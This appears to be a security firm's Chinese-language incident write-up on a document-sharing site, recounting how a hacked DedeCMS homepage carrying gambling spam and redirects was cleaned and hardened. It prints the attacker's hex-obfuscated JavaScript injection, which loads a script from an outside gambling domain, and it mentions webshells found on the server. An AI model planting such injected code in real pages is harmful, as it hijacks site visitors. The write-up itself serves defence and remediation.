收藏 分享(赏)

如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc

上传人:网站安全 文档编号:5802153 上传时间:2019-03-18 格式:DOC 页数:6 大小:496.50KB
下载 相关 举报
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc_第1页
第1页 / 共6页
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc_第2页
第2页 / 共6页
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc_第3页
第3页 / 共6页
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc_第4页
第4页 / 共6页
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示该页面存在木马病毒的实战过程.doc_第5页
第5页 / 共6页
点击查看更多>>
资源描述

1、2018.6.19 当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被劫持成什么世界杯投注,以及博彩,赌博等等的内容,根据以上客户给我们反映的网站被黑的问题,我们 Sine 安全公司立即安排安全技术人员对客户网站被黑的情况进行了详细的网站安全检测与代码的人工安全审计,发现客户网站首页之前是经常的被篡改,客户只能删除掉首页文件,然后重新生成首页,实在是反复被篡改的没办法了,才找到我们 SINE 安全公司来处理网站的安全问题.1. 网站被黑的状况分析1. 客

2、户的网站采用的是,织梦 DEDECMS 系统(PHP+MYSQL 数据库架构),dedecms 漏洞在近几年实在是爆出了太多, 但是现在用 dedecms 做网站以及平台的也很多,一般企业站或做优化排名的网站都是用这个织梦的程序来做,优化快, 访问速度也快,全站可以静态文件生成,方便管理更新文章,也方便网站打开的速度,以及关键词方面的优化与提升。通过与客户的沟通了解,发现客户的网站,只要是发布新的文章,并在后台生成新的 html 页面,或者生成首页 index.html,就会被攻击者直接增加了一些加密的代码与赌博的内容,图片如下:2.网站被篡改的内容都是加了一些什么,极速赛车,赌博,博彩、赌球

3、,世界杯投注的与网站不相关的内容,而且这个网站代码还做了 JS 判断跳转,针对于 Baidu 搜索来的客户,会直接跳转到这个极速赛车、赌博、博彩的页面,导致 360 提示博彩网站拦截,百度提示风险拦截的图片如下:网站在百度的搜索中会直接风险提示:百度网址安全中心提醒你:该页面可能存在木马病毒。通过对客户网站的所有代码的安全检测与代码的人工安全审计,发现网站首页 index.html中的内容被篡改,并发现在 dedecms 模板目录文件下的 index.htm 文件也被篡改了。我们来打开 index.htm 模板文件,看下代码:下面的这一段代码是加密的 JS 跳转代码,是根据百度搜索等相应的条件

4、,进行判断,然后跳转,直接输入网站域名不会跳转。window“x64x6fx63x75x6dx65x6ex74“x77x72x69x74x65“ (x3cx73x63x72x69x70x74x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x72x63x3dx22x68x74x74x70x3ax2fx2fx77x77x77x2ex38x30x30x30x6bx61x69x2ex63x6fx6dx2fx73x74x61x74x69x63x2fx6ax73x2fx38x30x30x30x6bx61x

5、69x2ex6ax73x22x3ex3cx2fx73x63x72x69x70x74x3e);上面查到一些加密的代码,用编码的解密查到,是一些博彩与赌球相关的内容,我们把生成首页后被篡改的内容直接删除掉,然后对其网站里留存下来的木马病毒,以及木马后门进行清除,并做好网站的漏洞检测与漏洞修复,部署网站防篡改方案。2. 网站被黑的清理过程记录1. 网站经过 SINE 安全技术的安全审计后,在安全的处理过程中发现网站根目录下的datas.php 文件内容属于 assert 类型的一句话木马。那么既然发现有一句话木马,那肯定是存在 PHP 脚本木马的,随即发现在 css 目录下有个文件是 base64

6、加密的代码, 我们访问该木马地址,进行了访问发现的确是木马病毒的,所在图片如下:该 PHP 脚本木马的操作权限实在是太大了 ,对文件的编辑以及改名,以及执行恶意的 sql 语句,查看服务器的系统信息都可以看的很清楚.对网站的所有程序代码,进行了木马特征扫描,发现了 N 个网站木马文件,怪不得客户自己说反反复复的出现被黑,网站被篡改的都快要吐血了。扫描到的木马病毒如下图所示:这么多个脚本木马后门,我们安全技术直接进行了全部删除清理,由于客户网站用的是单独的服务器。那么对服务器的安全也要进行详细的安全加固和网站安全防护,查看到网站的mysql 数据库,分配给网站使用的是 root 权限,(用 ro

7、ot 管理员权限会导致整个服务器都会被黑,增加了攻击风险)我们给客户服务器增加了一个普通权限的数据库账户分配给网站,数据库的端口 3306 以及 135 端口 445 端口 139 端口都进行了端口安全策略部署,杜绝外网一切连接,只允许内网连接,对服务器进行了详细的服务器安全设置和部署,后续我们对网站的所有文件,代码,图片,数据库里的内容,进行了详细的安全检测与对比,从 SQL 注入测试、XSS 跨站安全测试、表单绕过、文件上传漏洞测试、文件包含漏洞检测、网页挂马、网页后门木马检测、包括一句话小马、aspx 大马、脚本木马后门、敏感信息泄露测试、任意文件读取、目录遍历、弱口令安全检测等方面进行

8、了全面的安全检测,与漏洞修复,至此客户网站被黑的问题才得以完美的解决。因为之前客户都是平均一天被篡改两三次,从做安全部署到今天 20 号,客户网站访问一切正常,没有被篡改。3. 针对于网站被黑的防护建议1. 定期的更新服务器系统漏洞(windows 2008 2012、linux centos 系统),网站系统升级,尽量不适用第三方的 API 插件代码。2. 如果自己对程序代码不是太了解的话,建议找网站安全公司去修复网站的漏洞,以及代码的安全检测与木马后门清除,国内推荐 SINE 安全公司、绿盟安全公司、启明星辰等的网站安全公司,做深入的网站安全服务,来保障网站的安全稳定运行,防止网站被挂马之类的安全问题。3. 尽量不要把网站的后台用户的密码设置的太简单化, 要符合 10 到 18 位的大小写字母+数字+符号组合。4. 网站后台管理的路径一定不能用默认的 admin 或 guanli 或 manage 或文件名为admin.asp 的路径去访问。5. 服务器的基础安全设置必须要详细的做好, 端口的安全策略,注册表安全,底层系统的安全加固,否则服务器不安全,网站再安全也没用。

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 企业管理 > 经营企划

本站链接:文库   一言   我酷   合作


客服QQ:2549714901微博号:道客多多官方知乎号:道客多多

经营许可证编号: 粤ICP备2021046453号世界地图

道客多多©版权所有2020-2025营业执照举报